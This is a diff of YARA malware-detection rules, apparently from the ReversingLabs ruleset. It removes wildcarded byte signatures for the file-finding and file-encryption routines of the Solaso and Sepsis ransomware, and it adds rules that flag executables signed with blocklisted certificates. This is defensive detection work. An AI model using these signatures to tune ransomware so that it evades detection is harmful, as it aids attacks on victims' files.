-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Solaso"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            C6 85 ?? ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 4C 89 AD ?? ?? ?? ?? 48 8D 85
-            ?? ?? ?? ?? 48 89 45 ?? B1 ?? E8 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 4C 8D
-            85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B BD
-            ?? ?? ?? ?? 4C 8B BD ?? ?? ?? ?? 49 3B FF 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8D
-            95 ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 90 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ??
-            ?? 48 0F 43 95 ?? ?? ?? ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B C8 E8 ?? ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 95 ?? ?? ?? ??
-            4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CF 48 83 7F ?? ?? 72
-            ?? 48 8B 0F BA ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 44 24 ?? 4C 89 AD ??
-            ?? ?? ?? 4C 89 AD ?? ?? ?? ?? 48 8B B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ??
-            ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ?? 48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 85 ?? ?? ??
-            ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 48
-        }
-		$find_files_p2 = {
-            8B DE 48 83 CB ?? 48 3B D8 48 0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D
-            41 ?? 48 3B C1 0F 86 ?? ?? ?? ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 83 C0 ?? 48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8
-            E8 ?? ?? ?? ?? EB ?? 49 8B C5 48 89 85 ?? ?? ?? ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8
-            ?? ?? ?? ?? 48 89 9D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 4C 89 6D ?? 4C 89 6D ?? 48 8B
-            B5 ?? ?? ?? ?? 4C 8D B5 ?? ?? ?? ?? 48 83 BD ?? ?? ?? ?? ?? 4C 0F 43 B5 ?? ?? ?? ??
-            48 83 FE ?? 73 ?? 41 0F 10 06 0F 11 45 ?? 48 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48
-            B8 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 45 ?? 48 8B DE 48 83 CB ?? 48 89 5D ?? 48 3B D8 48
-            0F 47 D8 48 8D 4B ?? 48 81 F9 ?? ?? ?? ?? 72 ?? 48 8D 41 ?? 48 3B C1 0F 86 ?? ?? ??
-            ?? 0F AE E8 48 8B C8 E8 ?? ?? ?? ?? 48 8B C8 48 85 C0 0F 84 ?? ?? ?? ?? 48 83 C0 ??
-            48 83 E0 ?? 48 89 48 ?? EB ?? 48 85 C9 74 ?? 0F AE E8 E8 ?? ?? ?? ?? EB ?? 49 8B C5
-            48 89 45 ?? 4C 8D 46 ?? 49 8B D6 48 8B C8 E8 ?? ?? ?? ?? 48 89 5D ?? 48 89 75 ?? 4C
-            8D 85 ?? ?? ?? ?? 48 8D 55 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 8D
-        }
-		$encrypt_files_p1 = {
-            48 63 53 ?? 48 89 B5 ?? ?? ?? ?? 48 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 45 33
-            C0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ??
-            4C 63 43 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 4B ?? 48 85 C9 0F 84
-            ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 3B CA 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 45 ?? 48
-            83 BD ?? ?? ?? ?? ?? 48 0F 43 45 ?? C6 04 01 ?? EB ?? 48 8B F1 48 2B F2 4C 8B 85 ??
-            ?? ?? ?? 49 8B C0 48 2B C2 48 3B F0 77 ?? 48 89 8D ?? ?? ?? ?? 48 8D 7D ?? 49 83 F8
-            ?? 48 0F 43 7D ?? 48 03 FA 4C 8B C6 33 D2 48 8B CF E8 ?? ?? ?? ?? C6 04 37 ?? EB ??
-            0F AE E8 C6 44 24 ?? ?? 4C 8B CE 48 8B D6 48 8D 4D ?? E8 ?? ?? ?? ?? 33 F6 8B 43 ??
-            99 41 F7 FD B9 ?? ?? ?? ?? 85 C0 0F 45 C8 89 4B ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 4C 63
-            C9 4C 8D 45 ?? 48 8D 54 24 ?? E8 ?? ?? ?? ?? 48 8B F8 48 3B D8 74 ?? 48 8B 0B 48 85
-        }
-		$encrypt_files_p2 = {
-            C9 74 ?? 48 8B 53 ?? E8 ?? ?? ?? ?? 48 8B 0B 48 8B 53 ?? 48 2B D1 48 83 E2 ?? 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 48 89 33 48 89 73 ?? 48 89 73 ?? 48 8B 07 48 89
-            03 48 8B 47 ?? 48 89 43 ?? 48 8B 47 ?? 48 89 43 ?? 48 89 37 48 89 77 ?? 48 89 77 ??
-            48 8B 4C 24 ?? 48 85 C9 74 ?? 48 8B 54 24 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C
-            24 ?? 48 2B D1 48 83 E2 ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49
-            ?? 48 2B C1 48 83 C0 ?? 48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 74 24 ??
-            0F 57 C0 F3 0F 7F 44 24 ?? EB ?? 48 8B 0B 48 8D 45 ?? 48 3B C8 74 ?? 48 8D 55 ?? 48
-            83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B CB E8
-            ?? ?? ?? ?? 45 33 C0 48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 83 7B ?? ?? 74
-            ?? 33 FF 0F 1F 40 ?? 66 0F 1F 84 00 ?? ?? 00 00 4C 8B 03 4C 03 C7 49 8B D0 49 83 78
-            ?? ?? 72 ?? 49 8B 10 4D 8B 40 ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 63 CE 48 C1 E1 ?? 48
-        }
-		$encrypt_files_p3 = {
-            03 0B 45 33 C0 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0B 48 03 CF 48 C7 41 ?? ??
-            ?? ?? ?? 48 83 79 ?? ?? 72 ?? 48 8B 09 C6 01 ?? FF C6 48 83 C7 ?? 3B 73 ?? 75 ?? 48
-            8D 55 ?? 48 83 BD ?? ?? ?? ?? ?? 48 0F 43 55 ?? 4C 8B 85 ?? ?? ?? ?? 48 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 90 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D ??
-            48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ?? 48
-            83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 33 F6 F6 44 0C
-            ?? ?? 75 ?? E9 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 83 FA ?? 72 ?? 48 FF C2 48 8B 4D
-            ?? 48 8B C1 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 48 8B 49 ?? 48 2B C1 48 83 C0 ??
-            48 83 F8 ?? 0F 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? 48 8D 4C 24 ?? E8
-            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 44 24 ??
-            48 03 C8 41 8B D4 48 83 79 ?? ?? 0F 45 D3 0B 51 ?? 45 33 C0 E8 ?? ?? ?? ?? 48 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 85 C0 75 ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 85
-            ?? ?? ?? ?? 48 03 C8 48 83 79 ?? ?? 44 0F 45 E3 44 0B 61 ?? 45 33 C0 41 8B D4 E8 ??
-            ?? ?? ?? 90 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 89 BC 0D ?? ?? ?? ?? 48 8B 85 ?? ??
-            ?? ?? 48 63 48 ?? 8D 91 ?? ?? ?? ?? 89 94 0D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 84 0D ?? ?? ??
-            ?? 48 8B 85 ?? ?? ?? ?? 48 63 48 ?? 8D 51 ?? 89 94 0D ?? ?? ?? ?? 48 8D 1D ?? ?? ??
-            ?? 48 89 9D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 44 24 ?? 48 63
-        }
-		$encrypt_files_p4 = {
-            48 ?? 48 8D 05 ?? ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 91 ?? ?? ??
-            ?? 89 54 0C ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 63 48 ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 44 0C ?? 48 8B 44 24 ?? 48 63 48 ?? 8D 51 ?? 89 54 0C ?? 48 89 5D ??
-            48 8D 4D ?? E8 ?? ?? ?? ?? 90 49 8B 57 ?? 48 83 FA ?? 72 ?? 49 8B 0F 48 FF C2 48 81
-            FA ?? ?? ?? ?? 72 ?? 48 83 C2 ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 0F 87
-            ?? ?? ?? ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89 77 ?? 49 C7 47 ?? ?? ?? ?? ?? 41 C6 07 ??
-            49 8B 56 ?? 48 83 FA ?? 72 ?? 48 FF C2 49 8B 0E 48 81 FA ?? ?? ?? ?? 72 ?? 48 83 C2
-            ?? 4C 8B 41 ?? 49 2B C8 48 8D 41 ?? 48 83 F8 ?? 77 ?? 49 8B C8 E8 ?? ?? ?? ?? 49 89
-            76 ?? 49 C7 46 ?? ?? ?? ?? ?? 41 C6 06 ?? 48 8B 8D ?? ?? ?? ?? 48 33 CC E8 ?? ?? ??
-            ?? 48 8B 9C 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D C3
-            E8
-        }
-		$encrypt_files_p5 = {
-            48 8B C4 48 89 58 ?? 48 89 70 ?? 48 89 78 ?? 4C 89 40 ?? 55 41 54 41 55 41 56 41 57
-            48 8D 68 ?? 48 81 EC ?? ?? ?? ?? 45 8B E1 49 8B D8 44 8B 4D ?? 48 8B FA 44 8B 45 ??
-            48 8B F1 41 8B D4 48 8D 4D ?? E8 ?? ?? ?? ?? 0F 10 00 F2 0F 10 48 ?? 0F 11 45 ?? 66
-            0F 73 D8 ?? 66 49 0F 7E C7 F2 0F 11 4D ?? 49 C1 EF ?? F2 0F 11 4D ?? 4C 89 7D ?? 41
-            83 FF ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 89 07 83 F8 ?? 75 ?? E8 ?? ?? ?? ?? 33 F6 89 30 83 0F ?? E8 ?? ??
-            ?? ?? C7 00 ?? ?? ?? ?? EB ?? 8B 4D ?? 4C 8D 4D ?? 4C 8B 75 ?? 41 8B C4 48 8B 55 ??
-            45 8B C7 C1 E8 ?? 49 C1 EE ?? F7 D0 44 0B 75 ?? 83 E0 ?? C7 06 ?? ?? ?? ?? 33 F6 48
-            89 74 24 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B CB 48 C1 EA ?? C7 45 ?? ?? ?? ?? ?? 48
-            89 75 ?? 89 45 ?? 4C 89 75 ?? FF 15 ?? ?? ?? ?? 8B 5D ?? B9 ?? ?? ?? ?? 4C 8B E8 48
-            83 F8 ?? 75 ?? 8B C3 23 C1 3B C1 75 ?? 41 F6 C4 ?? 74 ?? 8B 4D ?? 4C 8D 4D ?? 48 89
-            74 24 ?? 0F BA F3 ?? 89 5D ?? 45 8B C7 48 8B 55 ?? 44 89 74 24 ?? 89 4C 24 ?? 48 8B
-        }
-		$encrypt_files_p6 = {
-            4D ?? 48 C1 EA ?? FF 15 ?? ?? ?? ?? 4C 8B E8 48 83 F8 ?? 75 ?? 48 63 0F 4C 8D 3D ??
-            ?? ?? ?? 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8 ?? ?? FF 15
-            ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 85 C0 75
-            ?? FF 15 ?? ?? ?? ?? 8B C8 8B D8 E8 ?? ?? ?? ?? 48 63 17 4C 8D 3D ?? ?? ?? ?? 48 8B
-            CA 83 E2 ?? 48 C1 F9 ?? 48 8D 14 D2 49 8B 0C CF 80 64 D1 ?? ?? 49 8B CD FF 15 ?? ??
-            ?? ?? 85 DB 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 44 8A
-            75 ?? 83 F8 ?? 75 ?? 41 80 CE ?? EB ?? 83 F8 ?? 75 ?? 41 80 CE ?? 8B 0F 49 8B D5 E8
-            ?? ?? ?? ?? 48 63 0F 4C 8D 3D ?? ?? ?? ?? 48 8B C1 41 80 CE ?? 48 C1 F8 ?? 83 E1 ??
-            44 88 75 ?? 49 8B 04 C7 48 8D 0C C9 44 88 74 C8 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1
-            F8 ?? 48 8D 0C C9 49 8B 04 C7 40 88 74 C8 ?? 41 F6 C4 ?? 74 ?? 8B 0F E8 ?? ?? ?? ??
-            89 45 ?? 85 C0 74 ?? 8B 0F E8 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 0F 10 45 ?? 4C 8D
-            4D ?? 8B 0F F2 0F 10 4D ?? 48 8D 55 ?? 45 8B C4 0F 29 45 ?? 40 88 75 ?? F2 0F 11 4D
-            ?? E8 ?? ?? ?? ?? 48 63 0F 89 45 ?? 85 C0 75 ?? 48 8B C1 48 C1 F9 ?? 83 E0 ?? 49 8B
-        }
-		$encrypt_files_p7 = {
-            0C CF 48 8D 14 C0 8A 45 ?? 88 44 D1 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D
-            14 C9 49 8B 0C C7 41 8B C4 C1 E8 ?? 24 ?? 80 64 D1 ?? ?? 08 44 D1 ?? 41 F6 C6 ?? 75
-            ?? 41 F6 C4 ?? 74 ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7
-            80 4C C8 ?? ?? B9 ?? ?? ?? ?? 8B C3 23 C1 3B C1 0F 85 ?? ?? ?? ?? 41 F6 C4 ?? 0F 84
-            ?? ?? ?? ?? 49 8B CD FF 15 ?? ?? ?? ?? 48 8B 4D ?? 4C 8D 4D ?? 44 8B 45 ?? 0F BA F3
-            ?? 48 89 74 24 ?? 89 4C 24 ?? 8B 4D ?? 89 4C 24 ?? 48 8B 4D ?? 89 5D ?? 48 8B 55 ??
-            48 C1 EA ?? FF 15 ?? ?? ?? ?? 48 8B D0 48 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B C8 E8
-            ?? ?? ?? ?? 48 63 0F 48 8B C1 83 E1 ?? 48 C1 F8 ?? 48 8D 0C C9 49 8B 04 C7 80 64 C8
-            ?? ?? 8B 0F E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 63 0F 48 8B C1 48 C1 F8 ?? 83 E1 ?? 49
-            8B 04 C7 48 8D 0C C9 48 89 54 C8 ?? 33 C0 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B
-            73 ?? 49 8B 7B ?? 49 8B E3 41 5F 41 5E 41 5D 41 5C 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RDCTO Ltd" and pe.signatures [ i ] . serial == "20:27:02" and 1087391361 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_369A02E5D90B2649040E7F87 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "2b81466f-3eb1-5c12-8878-9257dde968fb"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15152-L15168"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "e2a2e231914f166410580a42ca9d4aac18c5cba94d1f11d22e7acd6d375851d8"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "36:9a:02:e5:d9:0b:26:49:04:0e:7f:87" and 1479094204 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Sepsis ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "510ab702-103b-5863-ac9a-46a917879e72"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15170-L15186"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7"
+		logic_hash = "30998e3f5299a37cdee83b1232249b84dbb3c154ef99237da5ce1b16f9db5da3"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sepsis"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files_1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84
-        }
-		$search_files_2 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ??
-            ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ??
-            50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A
-        }
-		$search_files_3 = {
-            66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B
-            E5 5D C2
-        }
-		$search_files_4 = {
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6
-            85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24
-            ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ??
-            ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83
-            C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2
-        }
-		$encrypt_files_1 = {
-            BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? FF D6 0F 10 05 ?? ?? ?? ?? 8B F8 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 0F 11 07 89 3D ?? ?? ?? ?? 0F 10 05 ?? ?? ?? ?? 0F 11 47 ?? 0F 10 05 ??
-            ?? ?? ?? 0F 11 47 ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 8D
-            85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 8D
-            45 ?? 50 6A ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 ?? 50
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF E9 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 ?? 6A ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B CF 8D 51
-        }
-		$encrypt_files_2 = {
-            8A 01 41 84 C0 75 ?? 2B CA 8D 45 ?? 51 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 4D ??
-            89 4D ?? FF D3 85 C0 75 ?? 33 FF EB ?? FF 75 ?? FF D6 FF 75 ?? 8B F0 6A ?? 56 E8 ??
